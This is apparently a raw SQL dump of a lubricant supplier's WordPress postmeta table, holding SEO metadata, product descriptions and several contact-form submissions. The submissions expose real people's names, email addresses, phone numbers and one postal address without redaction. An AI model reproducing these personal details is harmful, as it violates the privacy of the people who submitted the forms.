INSERT INTO `wp_postmeta` VALUES (28105, 1644, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28106, 1643, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28107, 1645, '_wp_old_slug', 'tribosys-217x'); 
INSERT INTO `wp_postmeta` VALUES (28108, 1645, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28109, 1645, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28110, 1645, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28111, 1645, '_yoast_wpseo_focuskw_text_input', 'Hydraulic Oils'); 
INSERT INTO `wp_postmeta` VALUES (28112, 1645, '_yoast_wpseo_focuskw', 'Hydraulic Oils'); 
INSERT INTO `wp_postmeta` VALUES (28113, 1645, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28114, 1645, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28115, 1638, '_wp_old_slug', 'tribosys-212x'); 
INSERT INTO `wp_postmeta` VALUES (28116, 1638, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28117, 1638, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28118, 1638, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28119, 1638, '_yoast_wpseo_focuskw_text_input', 'Chain Oils'); 
INSERT INTO `wp_postmeta` VALUES (28120, 1638, '_yoast_wpseo_focuskw', 'Chain Oils'); 
INSERT INTO `wp_postmeta` VALUES (28121, 1638, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28122, 1638, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28123, 1646, '_wp_old_slug', 'tribosys-218x'); 
INSERT INTO `wp_postmeta` VALUES (28124, 1646, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28125, 1646, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28126, 1646, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28127, 1646, '_yoast_wpseo_focuskw_text_input', 'Roller Chain Oils'); 
INSERT INTO `wp_postmeta` VALUES (28128, 1646, '_yoast_wpseo_focuskw', 'Roller Chain Oils'); 
INSERT INTO `wp_postmeta` VALUES (28129, 1646, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28130, 1646, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28131, 3286, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28132, 3286, '_seq_num', '183'); 
INSERT INTO `wp_postmeta` VALUES (28133, 3286, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28134, 3286, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28135, 3286, '_field_1', 'Amanda Otocki'); 
INSERT INTO `wp_postmeta` VALUES (28136, 3286, '_field_10', 'Wicked Woods Jewelry LLC'); 
INSERT INTO `wp_postmeta` VALUES (28137, 3286, '_field_2', 'amanda.otocki@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (28138, 3286, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (28139, 3286, '_field_3', 'Hi there,\r\nI was wondering if you offer a Epoxy resin that is very clear in color, and has a pot life of less than 25 minutes? I make Resin Jewelry and accessories.\r\nHave a nice day, \r\nAmanda O.'); 
INSERT INTO `wp_postmeta` VALUES (28140, 3286, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28141, 3286, '_sub_id', '3286'); 
INSERT INTO `wp_postmeta` VALUES (28142, 1646, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28143, 1100, '_wp_old_slug', 'triobosys-2200'); 
INSERT INTO `wp_postmeta` VALUES (28144, 1100, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28145, 1100, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28146, 1100, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28147, 1100, '_yoast_wpseo_focuskw_text_input', 'Food Grade Silicone Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (28148, 1100, '_yoast_wpseo_focuskw', 'Food Grade Silicone Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (28149, 1100, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28150, 1100, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28151, 1100, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28152, 1100, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28153, 1100, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28154, 1100, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28155, 1100, '_ywtm_content_tab_description', '<h3>TriboSys 2200 | Food Grade Silicone Aerosol</h3>\r\nTriboSys™ 2200 is a multi-purpose food grade silicone aerosol, NSF Registered spray lubricant for all industries. It can be safely used on machinery used for producing, manufacturing, packing, processing, preparing, treating, packaging, transporting, or holding food.\r\n\r\nIt may be used on food-processing equipment as a protective anti-rust film and prevent corrosion buildup problems. It works well as a release agent on gaskets and seals for tank closures and as a dry lubricant for machine parts and equipment where there is incidental contact with food. It prevents sticking and retards tarnish. It stops squeaks and also waterproofs, while prolonging the life of rubber components and other materials.\r\n\r\nTypical Applications:\r\nHinges, Latches, Chains, Rollers, Casters, Wheels, Delivery Chutes, Table Tops, Packaging Slides, Belts, Doors, Locks, Rubber Moldings, Drawers, and many other miscellaneous parts and equipment.\r\n\r\n<strong>Advantages</strong>\r\nLubricates\r\nResists Rust and Corrosion\r\nWaterproofs\r\n\r\n<strong>Technical Service:</strong>\r\nTo select the most suitable lubricant for your application please call Technical Service at 800.992.2424 (8-4 Eastern Time). In Canada, call 800.323.4621 (8-4 Eastern Time)'); 
INSERT INTO `wp_postmeta` VALUES (28156, 1100, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28157, 1648, '_wp_old_slug', 'tribosys-222x'); 
INSERT INTO `wp_postmeta` VALUES (28158, 1648, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28159, 1648, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28160, 1648, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28161, 1648, '_yoast_wpseo_focuskw_text_input', 'High Temperature Greases'); 
INSERT INTO `wp_postmeta` VALUES (28162, 1648, '_yoast_wpseo_focuskw', 'High Temperature Greases'); 
INSERT INTO `wp_postmeta` VALUES (28163, 1648, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28164, 1648, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28165, 1648, '_yoast_wpseo_linkdex', '93'); 
INSERT INTO `wp_postmeta` VALUES (28166, 1647, '_wp_old_slug', 'tribosys-221x'); 
INSERT INTO `wp_postmeta` VALUES (28167, 1647, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28168, 1647, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28169, 1647, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28170, 1647, '_yoast_wpseo_focuskw_text_input', 'General Purpose Greases'); 
INSERT INTO `wp_postmeta` VALUES (28171, 1647, '_yoast_wpseo_focuskw', 'General Purpose Greases'); 
INSERT INTO `wp_postmeta` VALUES (28172, 1647, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28173, 1647, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28174, 1638, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28175, 1638, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28176, 1638, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28177, 1638, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28178, 1638, '_ywtm_content_tab_description', '<h3>TriboSys 212X | High Temperature Chain Oils</h3>\r\nPowerful penetrating chain oils for applications where the lubricant penetrates to reach the pins and bushings located within roller chains. Additional applications include hinges, castors, rollers, bolts, screw assemblies, bushings and cable.\r\n\r\n<strong>2120</strong>\r\nThis chain oil exhibits excellent anti-wear characteristics and power savings through friction reduction. It is an ashless, smokeless product with no carbon, varnish or gummy residue at higher and continuous temperatures up to 525˚F/274˚C.\r\n\r\n<strong>2121</strong>\r\nA combination of synthetic oils and submicron molybdenum disulfide for maximum lubrication of all moving parts on all chain designs. The synthetic fluids have a powerful cleaning action that breaks down and dissolves prior carbon, varnish and gum buildup.\r\n\r\n<strong>Advantages</strong>\r\n• Energy Efficient\r\n• Anti-Wear\r\n• Ashless-No Residue\r\n• Extends Chain and Track Life\r\n\r\n<strong>Typical Applications</strong>\r\n\r\n• High Temperature Ovens\r\n\r\n<span style="font-size: 14.4px;">• Tunnels </span>\r\n\r\n<span style="font-size: 14.4px;">•</span><span style="font-size: 14.4px;"> Reflow Ovens </span>\r\n\r\n<span style="font-size: 14.4px;">• Dryers </span>\r\n\r\n<span style="font-size: 14.4px;">• Tenter Frames </span>\r\n\r\n<span style="font-size: 14.4px;">• Shrink Wrap Machines</span>\r\n\r\n• Textile Auxiliaries\r\n\r\n• Steel\r\n\r\n• Plastic\r\n\r\n• Printing\r\n\r\n• Woodworking Processe\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (28179, 1638, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28180, 1649, '_wp_old_slug', 'tribosys-223x'); 
INSERT INTO `wp_postmeta` VALUES (28181, 1649, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28182, 1649, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28183, 1649, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28184, 1649, '_yoast_wpseo_focuskw_text_input', 'Food Grade Greases'); 
INSERT INTO `wp_postmeta` VALUES (28185, 1649, '_yoast_wpseo_focuskw', 'Food Grade Greases'); 
INSERT INTO `wp_postmeta` VALUES (28186, 1649, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28187, 1649, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28188, 1649, '_yoast_wpseo_linkdex', '91'); 
INSERT INTO `wp_postmeta` VALUES (28189, 1637, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28190, 1637, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28191, 1637, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28192, 1637, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28193, 1637, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28194, 1637, '_wp_old_slug', 'tribosys-211x'); 
INSERT INTO `wp_postmeta` VALUES (28195, 1637, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28196, 1637, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28197, 1637, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28198, 1637, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28199, 1637, '_ywtm_content_tab_description', '<strong>TriboSys™ 2110</strong>\r\n\r\nThis oil will out-wet and gives exceptionally long life, rust and corrosion protection for a variety of applications including circulating systems.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Non-Drip/Non-Foaming</li>\r\n 	<li>High V.I’s</li>\r\n 	<li>Increased Equipment Efficiency and Life</li>\r\n 	<li>Extra Non-Drip (END)</li>\r\n</ul>\r\n<strong>TriboSys™ 2111</strong>\r\n\r\nA semi-synthetic economical alternative to straight mineral oil lubricants. It has been proven to out-perform mineral oils in every important category. A true-multi-grade, multi-purpose oil designated for general plant-wide use.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Oxidation Resistant</li>\r\n 	<li>Anti-Wear and EP Film Strength</li>\r\n 	<li>Low Evaporation and Make-Up Rates</li>\r\n 	<li>Rust and Corrosion Protection, Non-Drip</li>\r\n 	<li>Reduced Consumption and Inventory</li>\r\n 	<li>Increased Equipment Efficiency</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (28200, 1637, '_yoast_wpseo_focuskw_text_input', 'General Purpose Oils'); 
INSERT INTO `wp_postmeta` VALUES (28201, 1637, '_yoast_wpseo_focuskw', 'General Purpose Oils'); 
INSERT INTO `wp_postmeta` VALUES (28202, 1637, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28203, 1645, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28204, 1647, '_yoast_wpseo_linkdex', '89'); 
INSERT INTO `wp_postmeta` VALUES (28206, 2936, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_358447820-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28209, 1128, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/canstockphoto17704348.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28210, 1801, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28211, 1801, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28212, 1801, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28213, 1801, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28214, 1801, '_ywtm_content_tab_description', '<h3>Teflon Multi Use | High-performance general purpose lubricant with extreme corrosion and wear protection</h3>\r\nTeflon Multi-Use Lubricant is a water repelling, rust-resisting lubricant. Enhanced with Teflon™ fluoropolymer for optimum performance.\r\n\r\n• Features Teflon™ fluoropolymer for enhanced wear protection and lubricity.\r\n• Contains calcium sulfonate for improved corrosion protection.\r\n• Designed for general purpose use.\r\n• Water-repelling silicone-free formula protects against rust.\r\n• Formulated with Teflon™ fluoropolymer to deliver longer lubricant life, higher temperature stability, and better resistance to water and chemical contaminants.\r\n• Provides extreme pressure wear protection.\r\n• Resists extreme cold temperatures (to -30°F)\r\n\r\n<strong>Ideal For Use in Applications Where:</strong>\r\n\r\n• Parts are exposed to extreme cold, hot or outdoor conditions.\r\n• High moisture applications where other lubricants are quickly washed off.\r\n• Parts need to be coated to prevent rust &amp; corrosion.\r\n• High RPM chains like motorcycle, ATV, Go-Kart, etc\r\n<h4><strong>Outstanding Features of Teflon Multi-Use:</strong></h4>\r\n• Exceptional anti-corrosion characteristics.\r\n• Temperature Range: -30°F to +300°F.\r\n• Provides superior anti-stick and EP properties.\r\n• Outstanding adhesion and long lubricant life.\r\n• Water repelling, protects against rust and corrosion.\r\n• Contains no silicones.\r\n• Non-staining film\r\n\r\n<strong>Typical Applications:</strong>\r\n\r\n• Use on any moving part including: Hinges, Mechanical Chains, Springs, Cables, Rollup Doors, Sliding Tracks, Pivots, Cams and Pulleys. Threaded Parts, Conveyor Rollers, Wheels, Windows, Locks and Latches. Hitches, Winches, Ramps, Gates, Tools &amp; Table Saws\r\n\r\n<strong>Properties of Material</strong>\r\n\r\n<strong>Base Lubricant</strong>\r\nPerformance Grade Lubricating Wax\r\nPTFE (Polytetrafluoroethylene)\r\nSynthesized Calcium Stearate\r\nAnti-wear Additives\r\nRust &amp; Corrosion Inhibitors\r\n<strong>Appearance</strong>\r\nNearly clear\r\n<strong>Flash Point</strong>\r\nAerosol: not available\r\nBulk Liquid: not available\r\n<strong>NFPA Flammability Rating</strong>\r\n3 (Highly Flammable)\r\n\r\n<strong>Directions For Use</strong>\r\n\r\n1. Provide adequate ventilation. Do not use near open flames.\r\n2. Shake or stir well before use to mix solids.\r\n3. Spray or brush the product on uniformly.\r\n4. For precision application use extension straw.'); 
INSERT INTO `wp_postmeta` VALUES (28215, 1801, '_yoast_wpseo_linkdex', '95'); 
INSERT INTO `wp_postmeta` VALUES (28216, 3291, '_wp_attached_file', '2016/09/143TE-RED-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28217, 3292, '_wp_attached_file', '2016/09/143TE-1.0-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28218, 3293, '_wp_attached_file', '2016/09/143TE-2.0-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28219, 3294, '_wp_attached_file', '2016/09/143TE-2.5-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28220, 3295, '_wp_attached_file', '2016/09/143TE-5-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28221, 3296, '_wp_attached_file', '2016/09/143TE-10-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28222, 3297, '_wp_attached_file', '2016/09/143TE-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28223, 3298, '_wp_attached_file', '2016/09/250-Series.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28224, 3299, '_wp_attached_file', '2016/09/280-15.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28225, 3300, '_wp_attached_file', '2016/09/470C-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28226, 3301, '_wp_attached_file', '2016/09/470S-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28227, 3302, '_wp_attached_file', '2016/09/472S-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28228, 3303, '_wp_attached_file', '2016/09/487G-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28229, 3304, '_wp_attached_file', '2016/09/530N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28230, 3305, '_wp_attached_file', '2016/09/532N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28231, 3306, '_wp_attached_file', '2016/09/538N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28232, 3307, '_wp_attached_file', '2016/09/539N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28233, 3308, '_wp_attached_file', '2016/09/550N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28234, 3309, '_wp_attached_file', '2016/09/552N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28235, 3310, '_wp_attached_file', '2016/09/580N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28236, 3311, '_wp_attached_file', '2016/09/582N-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28237, 3312, '_wp_attached_file', '2016/09/PFPE-Grease-with-Soluble-Additive.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28238, 3313, '_wp_attached_file', '2016/09/ReleaSys-82-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28239, 3314, '_wp_attached_file', '2016/09/ReleaSys-85-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28240, 3315, '_wp_attached_file', '2016/09/ReleaSys-88-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28241, 3316, '_wp_attached_file', '2016/09/ReleaSys-89-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28242, 3317, '_wp_attached_file', '2016/09/ReleaSys-8200-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28243, 3318, '_wp_attached_file', '2016/09/ReleaSys-8500-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28244, 3319, '_wp_attached_file', '2016/09/ReleaSys-8800-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28245, 3320, '_wp_attached_file', '2016/09/ReleaSys-8900-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28246, 3321, '_wp_attached_file', '2016/09/XHT-BD-series.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28247, 3322, '_wp_attached_file', '2016/09/10X.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28248, 3323, '_wp_attached_file', '2016/09/110XN-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28249, 3324, '_wp_attached_file', '2016/09/122AVL-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28250, 3325, '_wp_attached_file', '2016/09/122SEL-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28251, 3326, '_wp_attached_file', '2016/09/143E-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28252, 3327, '_wp_attached_file', '2016/09/143H-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28253, 3328, '_wp_attached_file', '2016/09/143TE-BLUE-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28255, 2056, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-ts4-threaded-pipe.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28259, 2050, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/tribosys-industrial.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28272, 2869, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_407802055-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28273, 3345, '_wp_attached_file', '2016/12/153A-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28274, 3346, '_wp_attached_file', '2016/12/485G-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28275, 3347, '_wp_attached_file', '2016/12/747-16.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28277, 3350, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28278, 3350, '_seq_num', '184'); 
INSERT INTO `wp_postmeta` VALUES (28279, 3350, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28280, 3350, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28281, 3350, '_field_1', 'Christopher Hatch'); 
INSERT INTO `wp_postmeta` VALUES (28282, 3350, '_field_10', 'Intuitive Surgical'); 
INSERT INTO `wp_postmeta` VALUES (28283, 3350, '_field_2', 'chris.hatch@intusurg.com'); 
INSERT INTO `wp_postmeta` VALUES (28284, 3350, '_field_8', '(858) 539-3240'); 
INSERT INTO `wp_postmeta` VALUES (28285, 3350, '_field_3', 'We are having issues electrical connection issues with a surgical instrument. We suspect that a combination of repeated use, dissimilar materials, and sterilization procedures is causing corrosion and intermittent contact issues. I&#039;m interested in your connector lubricants and whether or not they can survive our sterilization procedures.'); 
INSERT INTO `wp_postmeta` VALUES (28286, 3350, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28287, 3350, '_sub_id', '3350'); 
INSERT INTO `wp_postmeta` VALUES (28288, 3351, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28289, 3351, '_seq_num', '185'); 
INSERT INTO `wp_postmeta` VALUES (28290, 3351, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28291, 3351, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28292, 3351, '_field_1', 'sun'); 
INSERT INTO `wp_postmeta` VALUES (28293, 3351, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (28294, 3351, '_field_2', 'jinanchangren@163.com'); 
INSERT INTO `wp_postmeta` VALUES (28295, 3351, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (28296, 3351, '_field_3', 'I WANT TO BUY MX-143XD IN CHINA. THANK YOU'); 
INSERT INTO `wp_postmeta` VALUES (28297, 3351, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28298, 3351, '_sub_id', '3351'); 
INSERT INTO `wp_postmeta` VALUES (28299, 3352, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28300, 3352, '_seq_num', '186'); 
INSERT INTO `wp_postmeta` VALUES (28301, 3352, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28302, 3352, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28303, 3352, '_field_1', 'Richard Ojeda'); 
INSERT INTO `wp_postmeta` VALUES (28304, 3352, '_field_10', 'WWD USA Group LLC'); 
INSERT INTO `wp_postmeta` VALUES (28305, 3352, '_field_2', 'richard@wwdevices.com'); 
INSERT INTO `wp_postmeta` VALUES (28306, 3352, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (28307, 3352, '_field_3', 'Please quote on the Krytox 1525 in smallest size available.\nQty. 6 each'); 
INSERT INTO `wp_postmeta` VALUES (28308, 3352, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28309, 3352, '_sub_id', '3352'); 
INSERT INTO `wp_postmeta` VALUES (28310, 3353, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28311, 3353, '_seq_num', '187'); 
INSERT INTO `wp_postmeta` VALUES (28312, 3353, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28313, 3353, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28314, 3353, '_field_1', 'Brian Snow'); 
INSERT INTO `wp_postmeta` VALUES (28315, 3353, '_field_10', 'Facilities Mnagement Group'); 
INSERT INTO `wp_postmeta` VALUES (28316, 3353, '_field_2', 'fmgsnow@aol.com'); 
INSERT INTO `wp_postmeta` VALUES (28317, 3353, '_field_8', '(315) 272-5050'); 
INSERT INTO `wp_postmeta` VALUES (28318, 3353, '_field_3', 'I am looking for Krytox GLP20x for my O2 system and cannot find a distributor to purchase from.  Do you have this in stock, and if so, how much.  I run a small ambulatory surgical center and do not require more than one or two tubes. '); 
INSERT INTO `wp_postmeta` VALUES (28319, 3353, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28320, 3353, '_sub_id', '3353'); 
INSERT INTO `wp_postmeta` VALUES (28321, 3354, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28322, 3354, '_seq_num', '188'); 
INSERT INTO `wp_postmeta` VALUES (28323, 3354, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28324, 3354, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28325, 3354, '_field_1', 'David Godfrey'); 
INSERT INTO `wp_postmeta` VALUES (28326, 3354, '_field_10', 'Mohawk Hospital Equipment'); 
INSERT INTO `wp_postmeta` VALUES (28327, 3354, '_field_2', 'dgodfrey@emohawk.com'); 
INSERT INTO `wp_postmeta` VALUES (28328, 3354, '_field_8', '(315) 794-1726'); 
INSERT INTO `wp_postmeta` VALUES (28329, 3354, '_field_3', 'I have a customer that needs the MilLube for Oxygen  Where can they purchase?'); 
INSERT INTO `wp_postmeta` VALUES (28330, 3354, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28331, 3354, '_sub_id', '3354'); 
INSERT INTO `wp_postmeta` VALUES (28332, 3355, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (28333, 3355, '_seq_num', '182'); 
INSERT INTO `wp_postmeta` VALUES (28334, 3355, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28335, 3355, '_field_12', 'Mike Van'); 
INSERT INTO `wp_postmeta` VALUES (28336, 3355, '_field_13', 'EMS grand Rapids Inc.'); 
INSERT INTO `wp_postmeta` VALUES (28337, 3355, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (28338, 3355, '_field_14', 'emstriad@aol.com'); 
INSERT INTO `wp_postmeta` VALUES (28339, 3355, '_field_15', '(616) 243-8866'); 
INSERT INTO `wp_postmeta` VALUES (28340, 3355, '_field_16', 'Chris ,Please send us three cans of MS-122AV\n\nEms Grand Rapids\n1057 Cottage Grove\nGrand Rapids Mi, 49507'); 
INSERT INTO `wp_postmeta` VALUES (28341, 3355, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (28342, 3355, '_sub_id', '3355'); 
INSERT INTO `wp_postmeta` VALUES (28343, 3356, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28344, 3356, '_seq_num', '189'); 
INSERT INTO `wp_postmeta` VALUES (28345, 3356, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28346, 3356, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28347, 3356, '_field_1', 'Emmanuel Emmanuel'); 
INSERT INTO `wp_postmeta` VALUES (28348, 3356, '_field_10', 'Spruttinc'); 
INSERT INTO `wp_postmeta` VALUES (28349, 3356, '_field_2', 'spruttinc@aol.com'); 
INSERT INTO `wp_postmeta` VALUES (28350, 3356, '_field_8', '(832) 704-9221'); 
